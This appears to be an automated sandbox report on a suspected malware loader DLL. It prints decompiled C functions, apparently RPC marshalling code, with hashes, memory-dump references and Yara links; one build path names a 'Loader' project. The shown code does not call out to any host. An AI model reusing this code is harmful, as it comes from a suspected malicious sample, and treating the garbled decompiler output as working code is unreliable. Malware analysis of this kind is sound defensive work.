                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: BufferComplexSize@12Struct
                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                              • API String ID: 1319815426-1841717460
                                                                                              • Opcode ID: bcc3e41eb6c43cd89d9ca243c03647130815eaa019938c8ec752e39fe169b312
                                                                                              • Instruction ID: ccf1049524eeadfabec85485ea86d0cfa06b1e93665ebda6a448287afeed988b
                                                                                              • Opcode Fuzzy Hash: bcc3e41eb6c43cd89d9ca243c03647130815eaa019938c8ec752e39fe169b312
                                                                                              • Instruction Fuzzy Hash: C5A1E8B4A00209EFCB08CF58C990AAEBBB5FF88354F148158ED599B355D731EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F7047D0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 175COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E6F7047D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v48;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;

				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
				_v8 = 0;
				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				0x6f700000("index=%d\n", _v20);
				_t131 = _a4;
				E6F70E8C0(_a4, 2, _a12,  &_v48);
				_t186 = _t183 + 0x2c;
				if((_v12 & 0x000000c0) == 0) {
					E6F7073D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
					_t187 = _t186 + 8;
				} else {
					E6F7073D0(_t131, _a4 + 4, 4);
					_t188 = _t186 + 8;
					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
					_t153 = _a4;
					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
						_v8 =  *((intOrPtr*)(_a4 + 4));
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						_t153 = _a4;
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					E6F7073D0(_t153, _a4 + 4, 8);
					_t187 = _t188 + 8;
				}
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				if((_a16 & 0x000000ff) != 0) {
					 *_a8 =  *0x6f700000(_a4, _v16);
					E6F710730( *_a8, 0, _v16);
					_t187 = _t187 + 0xc;
				}
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
				if(_v8 != 0) {
					do {
						0x6f700000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
						_t187 = _t187 + 0xc;
						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
							0x6f700000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
							_t187 = _t187 + 8;
						}
					} while (0 != 0);
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 4)) = _v8;
				}
				return 0;
			}












                                                                                              0x6f7047e5
                                                                                              0x6f7047f6
                                                                                              0x6f704808
                                                                                              0x6f70480b
                                                                                              0x6f704828
                                                                                              0x6f704839
                                                                                              0x6f70484b
                                                                                              0x6f70484f
                                                                                              0x6f704854
                                                                                              0x6f704860
                                                                                              0x6f7048ce
                                                                                              0x6f7048d3
                                                                                              0x6f704862
                                                                                              0x6f70486b
                                                                                              0x6f704870
                                                                                              0x6f70487f
                                                                                              0x6f704882
                                                                                              0x6f704889
                                                                                              0x6f704891
                                                                                              0x6f70489d
                                                                                              0x6f7048a0
                                                                                              0x6f7048a3
                                                                                              0x6f7048a3
                                                                                              0x6f7048b3
                                                                                              0x6f7048b8
                                                                                              0x6f7048b8
                                                                                              0x6f7048dc
                                                                                              0x6f7048e6
                                                                                              0x6f7048e6
                                                                                              0x6f7048f0
                                                                                              0x6f704903
                                                                                              0x6f704911
                                                                                              0x6f704916
                                                                                              0x6f704916
                                                                                              0x6f704942
                                                                                              0x6f704949
                                                                                              0x6f70494b
                                                                                              0x6f704966
                                                                                              0x6f70496b
                                                                                              0x6f704982
                                                                                              0x6f7049a0
                                                                                              0x6f7049a5
                                                                                              0x6f7049a5
                                                                                              0x6f7049a8
                                                                                              0x6f7049b5
                                                                                              0x6f7049be
                                                                                              0x6f7049be
                                                                                              0x6f7049c6

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                              • API String ID: 2102423945-3620127348
                                                                                              • Opcode ID: 269ef0894036fbde52fb0b4dbbb9a24ea8be52dc4ccdb54796e9244407f31434
                                                                                              • Instruction ID: 8b903f1c70ea3859944aaec0c42e1ae477bec6ed7f04681a8c48ba54b0ce2cb5
                                                                                              • Opcode Fuzzy Hash: 269ef0894036fbde52fb0b4dbbb9a24ea8be52dc4ccdb54796e9244407f31434
                                                                                              • Instruction Fuzzy Hash: 4E710DB5A00208AFDB04DF58C994EAA7BB5FF88318F14C159ED499F385D731EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F708700, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 16%
                                                                                              			E6F708700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
				intOrPtr _v8;
				signed char* _t58;
				void* _t61;
				void* _t62;

				0x6f700000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
				_t62 = _t61 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t62 = _t62 + 8;
					 *0x6f700000(0x6e6);
				}
				0x6f700000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					__eflags = 1;
					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
				} else {
					_t58 = _a12;
					_t66 = _t58[1] & 0x80;
					if((_t58[1] & 0x80) == 0) {
						E6F702310(__eflags, _a4, _a8, 0);
					} else {
						E6F702310(_t66, _a4,  *_a8, 0);
					}
				}
				return 0;
			}







                                                                                              0x6f708718
                                                                                              0x6f70871d
                                                                                              0x6f708729
                                                                                              0x6f708737
                                                                                              0x6f70873c
                                                                                              0x6f708744
                                                                                              0x6f708744
                                                                                              0x6f70875f
                                                                                              0x6f708770
                                                                                              0x6f7087b7
                                                                                              0x6f7087c6
                                                                                              0x6f708772
                                                                                              0x6f70877a
                                                                                              0x6f708781
                                                                                              0x6f708786
                                                                                              0x6f7087a5
                                                                                              0x6f708788
                                                                                              0x6f708794
                                                                                              0x6f708794
                                                                                              0x6f7087aa
                                                                                              0x6f7087ce

                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F708794
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F7087A5
                                                                                              Strings
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F708713
                                                                                              • invalid format type %x, xrefs: 6F708732
                                                                                              • flags: 0x%02x, xrefs: 6F70875A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 1d5776425c8dc0659087306901d81bb7706b5ddf71f716d9ab33a1bff81edcca
                                                                                              • Instruction ID: a6549501f8793851710fbf1ece3498691110b705ef5ed15a6136af597d7937cc
                                                                                              • Opcode Fuzzy Hash: 1d5776425c8dc0659087306901d81bb7706b5ddf71f716d9ab33a1bff81edcca
                                                                                              • Instruction Fuzzy Hash: CA2195F5208294ABD704DF54D990FAA37E5BF89311F008569FD648B3C9D635EA10CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F70D830, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 49%
                                                                                              			E6F70D830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;

				_v28 = _a4 & 0x000000ff;
				_v28 = _v28 - 0x1b;
				if(_v28 > 0xa) {
					L57:
					0x6f700000("unknown array format 0x%x\n", _a4 & 0x000000ff);
					return  *0x6f700000(0x6f7);
				}
				_t7 = _v28 + 0x6f70de1c; // 0xcccccc03
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6F70DE08))) {
					case 0:
						_v12 =  *((intOrPtr*)(_a16 + 2));
						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						_v16 = _v24;
						_a16 = E6F70A440(_a8, _a16 + 4);
						E6F7073D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						_t298 = _t294 + 0x18;
						if((_a28 & 0x000000ff) == 0) {
							L11:
							return _v16;
						} else {
							if((_a20 & 0x000000ff) == 0) {
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) != 0) {
									_t250 = _a8;
									__eflags =  *(_t250 + 0x20) & 0x000000ff;
									if(( *(_t250 + 0x20) & 0x000000ff) == 0) {
										__eflags =  *_a12;
										if( *_a12 == 0) {
											 *_a12 =  *(_a8 + 4);
										}
									}
								}
							} else {
								_t252 = E6F70A3B0(_v24, _a8, _v24);
								_t298 = _t298 + 8;
								 *_a12 = _t252;
							}
							_v20 =  *(_a8 + 4);
							E6F70AF00(_a8, _v16);
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							E6F70C2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							_push( *_a12);
							_push(_v20);
							_push("copying %p to %p\n");
							0x6f700000();
							if( *_a12 != _v20) {
								E6F7100E0( *_a12, _v20, _v16);
							}
							goto L11;
						}
					case 1:
						__eax = _a16;
						__cx =  *((intOrPtr*)(__eax + 2));
						_v12 =  *((intOrPtr*)(__eax + 2));
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6F70A440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6F70A540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
						__edx = _v5 & 0x000000ff;
						_a8 = _a8 + 4;
						__eax = E6F7073D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_v40 =  *(__edx + 0x40);
							__ecx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__edx = _a12;
								__eflags =  *_a12;
								if( *_a12 == 0) {
									_a20 = 1;
								}
							}
							__eax = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) != 0) {
								__ecx = _v24;
								__edx = _a8;
								__eax = E6F70A3B0(_v24, _a8, _v24);
								__ecx = _a12;
								 *_a12 = __eax;
							}
							__edx = _a8;
							__eax =  *(__edx + 4);
							_v20 =  *(__edx + 4);
							__ecx = _v16;
							__edx = _a8;
							E6F70AF00(_a8, _v16) = _a8;
							__ecx = _v20;
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							__edx = _a20 & 0x000000ff;
							__eax = _a16;
							__ecx = _a12;
							__edx =  *_a12;
							__eax = _v20;
							__ecx = _a8;
							__eax = E6F70C2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							__edx = _v16;
							__eax = _v20;
							__ecx = _a12;
							 *_a12 =  *_a12 + _v40;
							__eflags =  *_a12 + _v40;
							__eax = E6F7100E0( *_a12 + _v40, _v20, _v16);
						}
						__eax = _v16;
						return _v16;
					case 2:
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6F70A440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6F70A540(_a8, _a8, _a16,  *(_a8 + 0x3c));
						__edx = _a16;
						_push(_a16);
						__eax = _a8;
						_push(_a8);
						0x6f700000();
						__esp = __esp + 8;
						_v12 = __ax;
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if(__eflags == 0) {
							_push(0xab4);
							__eax = E6F70FA34(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
						}
						__eax = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) == 0) {
							__ecx = _a12;
							__eflags =  *_a12;
							if( *_a12 == 0) {
								_a20 = 1;
							}
						}
						__edx = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) != 0) {
							__eax = _v24;
							__ecx = _a8;
							__eax = E6F70A3B0(_a8, _a8, _v24);
							__edx = _a12;
							 *_a12 = __eax;
						}
						__eax = _v5 & 0x000000ff;
						__ecx = _a8;
						__ecx = _a8 + 4;
						__eax = E6F7073D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						__edx = _a8;
						__eax =  *(__edx + 4);
						_v20 =  *(__edx + 4);
						__ecx = _a12;
						__edx =  *_a12;
						_v36 =  *_a12;
						__eax = _a8;
						__ecx =  *(__eax + 0x44);
						_v44 =  *(__eax + 0x44);
						_v32 = 0;
						while(1) {
							__eax = _v32;
							__eflags = _v32 - _v44;
							if(_v32 >= _v44) {
								break;
							}
							__ecx = _a20 & 0x000000ff;
							__edx = _a16;
							__eax = _v36;
							__ecx = _a8;
							_v36 = E6F709560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
							__edx = _v32;
							__edx = _v32 + 1;
							__eflags = __edx;
							_v32 = __edx;
						}
						__edx = _a8;
						 *(__edx + 4) =  *(__edx + 4) - _v20;
						return  *(__edx + 4) - _v20;
					case 3:
						__eax = _a4 & 0x000000ff;
						__eflags = (_a4 & 0x000000ff) - 0x22;
						if((_a4 & 0x000000ff) != 0x22) {
							__edx = 2;
							_v12 = __dx;
						} else {
							__ecx = 1;
							_v12 = __cx;
						}
						__eax = _a8;
						__ecx =  *(_a8 + 0x3c);
						__edx = _a8;
						E6F70A540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
						__eax = 1 << 0;
						__ecx = _a16;
						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
							__eax = _a8;
							__ecx = _a8;
							__edx =  *(__eax + 0x3c);
							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
								__eax = _a8;
								__ecx =  *(__eax + 0x3c);
								_push( *(__eax + 0x3c));
								__edx = _a8;
								__eax =  *(__edx + 0x44);
								_push( *(__edx + 0x44));
								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
								0x6f700000();
								__esp = __esp + 0xc;
								_push(0x6c6);
								__eax =  *0x6f700000();
							}
						}
						__ecx = _a8;
						__eflags =  *(__ecx + 0x40);
						if( *(__ecx + 0x40) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_push( *(__edx + 0x40));
							_push("conformant strings can\'t have Offset (%d)\n");
							0x6f700000();
							__esp = __esp + 8;
							_push(0x6c6);
							__eax =  *0x6f700000();
						}
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _v12 & 0x0000ffff;
						__edx = _v16;
						_a8 = E6F70B0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) == 0) {
							L44:
							__eax = _v16;
							return _v16;
						} else {
							__edx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__eax = _a24 & 0x000000ff;
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) == 0) {
									L36:
									__ecx = _a12;
									__eflags =  *_a12;
									if( *_a12 == 0) {
										__edx = _v24;
										_push(_v24);
										__eax = _a8;
										_push(_a8);
										__eax =  *0x6f700000();
										__ecx = _a12;
										 *_a12 = _a8;
									}
									L38:
									__edx = _a12;
									__eax = _a8;
									__ecx =  *_a12;
									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
										__ecx = _v16;
										__edx = _a12;
										__eax =  *_a12;
										__ecx = _a8;
										__eax = E6F70AFA0(_a8,  *_a12, _v16);
									} else {
										__edx = _v16;
										_a8 = E6F70AF00(_a8, _v16);
									}
									__edx = _a16;
									__eax =  *_a16 & 0x000000ff;
									__eflags = __eax - 0x22;
									if(__eax != 0x22) {
										__eax = _a12;
										__ecx =  *__eax;
										_push( *__eax);
										0x6f700000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6f700000();
										__esp = __esp + 8;
									} else {
										__ecx = _a12;
										__edx =  *_a12;
										_push( *_a12);
										0x6f700000();
										__esp = __esp + 4;
										_push(__eax);
										_push("string=%s\n");
										0x6f700000();
										__esp = __esp + 8;
									}
									goto L44;
								}
								__ecx = _a8;
								__edx =  *(__ecx + 0x20) & 0x000000ff;
								__eflags =  *(__ecx + 0x20) & 0x000000ff;
								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
									goto L36;
								}
								__eax = _a12;
								__eflags =  *_a12;
								if( *_a12 != 0) {
									goto L36;
								}
								__ecx = _a8;
								__edx = _a8;
								__eax =  *(__ecx + 0x3c);
								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
									goto L36;
								}
								__ecx = _a12;
								__edx = _a8;
								__eax =  *(__edx + 4);
								 *_a12 =  *(__edx + 4);
								goto L38;
							}
							__eax = _v24;
							_push(_v24);
							__ecx = _a8;
							_push(_a8);
							__eax =  *0x6f700000();
							__edx = _a12;
							 *_a12 = _v24;
							goto L38;
						}
					case 4:
						goto L57;
				}
			}













                                                                                              0x6f70d83a
                                                                                              0x6f70d843
                                                                                              0x6f70d84a
                                                                                              0x6f70dde7
                                                                                              0x6f70ddf1
                                                                                              0x00000000
                                                                                              0x6f70ddfe
                                                                                              0x6f70d853
                                                                                              0x6f70d85a
                                                                                              0x00000000
                                                                                              0x6f70d868
                                                                                              0x6f70d87e
                                                                                              0x6f70d895
                                                                                              0x6f70d89b
                                                                                              0x6f70d8b1
                                                                                              0x6f70d8c0
                                                                                              0x6f70d8c5
                                                                                              0x6f70d8ce
                                                                                              0x6f70d991
                                                                                              0x00000000
                                                                                              0x6f70d8d4
                                                                                              0x6f70d8da
                                                                                              0x6f70d8f7
                                                                                              0x6f70d8f9
                                                                                              0x6f70d8fb
                                                                                              0x6f70d902
                                                                                              0x6f70d904
                                                                                              0x6f70d909
                                                                                              0x6f70d90c
                                                                                              0x6f70d917
                                                                                              0x6f70d917
                                                                                              0x6f70d90c
                                                                                              0x6f70d904
                                                                                              0x6f70d8dc
                                                                                              0x6f70d8e4
                                                                                              0x6f70d8e9
                                                                                              0x6f70d8ef
                                                                                              0x6f70d8ef
                                                                                              0x6f70d91f
                                                                                              0x6f70d92a
                                                                                              0x6f70d938
                                                                                              0x6f70d952
                                                                                              0x6f70d95f
                                                                                              0x6f70d963
                                                                                              0x6f70d964
                                                                                              0x6f70d969
                                                                                              0x6f70d979
                                                                                              0x6f70d989
                                                                                              0x6f70d98e
                                                                                              0x00000000
                                                                                              0x6f70d979
                                                                                              0x00000000
                                                                                              0x6f70d999
                                                                                              0x6f70d99c
                                                                                              0x6f70d9a0
                                                                                              0x6f70d9a9
                                                                                              0x6f70d9ac
                                                                                              0x6f70d9b3
                                                                                              0x6f70d9b6
                                                                                              0x6f70d9bc
                                                                                              0x6f70d9c0
                                                                                              0x6f70d9cc
                                                                                              0x6f70d9cf
                                                                                              0x6f70d9d2
                                                                                              0x6f70d9d6
                                                                                              0x6f70d9da
                                                                                              0x6f70d9e6
                                                                                              0x6f70d9e9
                                                                                              0x6f70d9f1
                                                                                              0x6f70d9f5
                                                                                              0x6f70d9fd
                                                                                              0x6f70da00
                                                                                              0x6f70da04
                                                                                              0x6f70da11
                                                                                              0x6f70da14
                                                                                              0x6f70da17
                                                                                              0x6f70da1b
                                                                                              0x6f70da28
                                                                                              0x6f70da2b
                                                                                              0x6f70da2f
                                                                                              0x6f70da31
                                                                                              0x6f70da37
                                                                                              0x6f70da3a
                                                                                              0x6f70da3d
                                                                                              0x6f70da40
                                                                                              0x6f70da44
                                                                                              0x6f70da46
                                                                                              0x6f70da48
                                                                                              0x6f70da4b
                                                                                              0x6f70da4e
                                                                                              0x6f70da50
                                                                                              0x6f70da50
                                                                                              0x6f70da4e
                                                                                              0x6f70da54
                                                                                              0x6f70da58
                                                                                              0x6f70da5a
                                                                                              0x6f70da5c
                                                                                              0x6f70da60
                                                                                              0x6f70da64
                                                                                              0x6f70da6c
                                                                                              0x6f70da6f
                                                                                              0x6f70da6f
                                                                                              0x6f70da71
                                                                                              0x6f70da74
                                                                                              0x6f70da77
                                                                                              0x6f70da7a
                                                                                              0x6f70da7e
                                                                                              0x6f70da8a
                                                                                              0x6f70da8d
                                                                                              0x6f70da90
                                                                                              0x6f70da93
                                                                                              0x6f70da98
                                                                                              0x6f70da9c
                                                                                              0x6f70da9f
                                                                                              0x6f70daa2
                                                                                              0x6f70daa6
                                                                                              0x6f70daaa
                                                                                              0x6f70dab2
                                                                                              0x6f70dab6
                                                                                              0x6f70daba
                                                                                              0x6f70dabf
                                                                                              0x6f70dabf
                                                                                              0x6f70dac3
                                                                                              0x6f70dac8
                                                                                              0x6f70dacb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dcb9
                                                                                              0x6f70dcbc
                                                                                              0x6f70dcc3
                                                                                              0x6f70dcc6
                                                                                              0x6f70dccc
                                                                                              0x6f70dcd0
                                                                                              0x6f70dcdc
                                                                                              0x6f70dcdf
                                                                                              0x6f70dce2
                                                                                              0x6f70dce6
                                                                                              0x6f70dcea
                                                                                              0x6f70dcf6
                                                                                              0x6f70dcf9
                                                                                              0x6f70dcfc
                                                                                              0x6f70dcfd
                                                                                              0x6f70dd00
                                                                                              0x6f70dd01
                                                                                              0x6f70dd06
                                                                                              0x6f70dd09
                                                                                              0x6f70dd0d
                                                                                              0x6f70dd10
                                                                                              0x6f70dd14
                                                                                              0x6f70dd21
                                                                                              0x6f70dd24
                                                                                              0x6f70dd28
                                                                                              0x6f70dd2a
                                                                                              0x6f70dd2c
                                                                                              0x6f70dd3b
                                                                                              0x6f70dd40
                                                                                              0x6f70dd43
                                                                                              0x6f70dd47
                                                                                              0x6f70dd49
                                                                                              0x6f70dd4b
                                                                                              0x6f70dd4e
                                                                                              0x6f70dd51
                                                                                              0x6f70dd53
                                                                                              0x6f70dd53
                                                                                              0x6f70dd51
                                                                                              0x6f70dd57
                                                                                              0x6f70dd5b
                                                                                              0x6f70dd5d
                                                                                              0x6f70dd5f
                                                                                              0x6f70dd63
                                                                                              0x6f70dd67
                                                                                              0x6f70dd6f
                                                                                              0x6f70dd72
                                                                                              0x6f70dd72
                                                                                              0x6f70dd74
                                                                                              0x6f70dd79
                                                                                              0x6f70dd7c
                                                                                              0x6f70dd80
                                                                                              0x6f70dd88
                                                                                              0x6f70dd8b
                                                                                              0x6f70dd8e
                                                                                              0x6f70dd91
                                                                                              0x6f70dd94
                                                                                              0x6f70dd96
                                                                                              0x6f70dd99
                                                                                              0x6f70dd9c
                                                                                              0x6f70dd9f
                                                                                              0x6f70dda2
                                                                                              0x6f70ddb4
                                                                                              0x6f70ddb4
                                                                                              0x6f70ddb7
                                                                                              0x6f70ddba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70ddbc
                                                                                              0x6f70ddc3
                                                                                              0x6f70ddc7
                                                                                              0x6f70ddcb
                                                                                              0x6f70ddd7
                                                                                              0x6f70ddab
                                                                                              0x6f70ddae
                                                                                              0x6f70ddae
                                                                                              0x6f70ddb1
                                                                                              0x6f70ddb1
                                                                                              0x6f70dddc
                                                                                              0x6f70dde2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dad3
                                                                                              0x6f70dad7
                                                                                              0x6f70dada
                                                                                              0x6f70dae7
                                                                                              0x6f70daec
                                                                                              0x6f70dadc
                                                                                              0x6f70dadc
                                                                                              0x6f70dae1
                                                                                              0x6f70dae1
                                                                                              0x6f70daf0
                                                                                              0x6f70daf3
                                                                                              0x6f70daf9
                                                                                              0x6f70db05
                                                                                              0x6f70db0a
                                                                                              0x6f70db0d
                                                                                              0x6f70db10
                                                                                              0x6f70db14
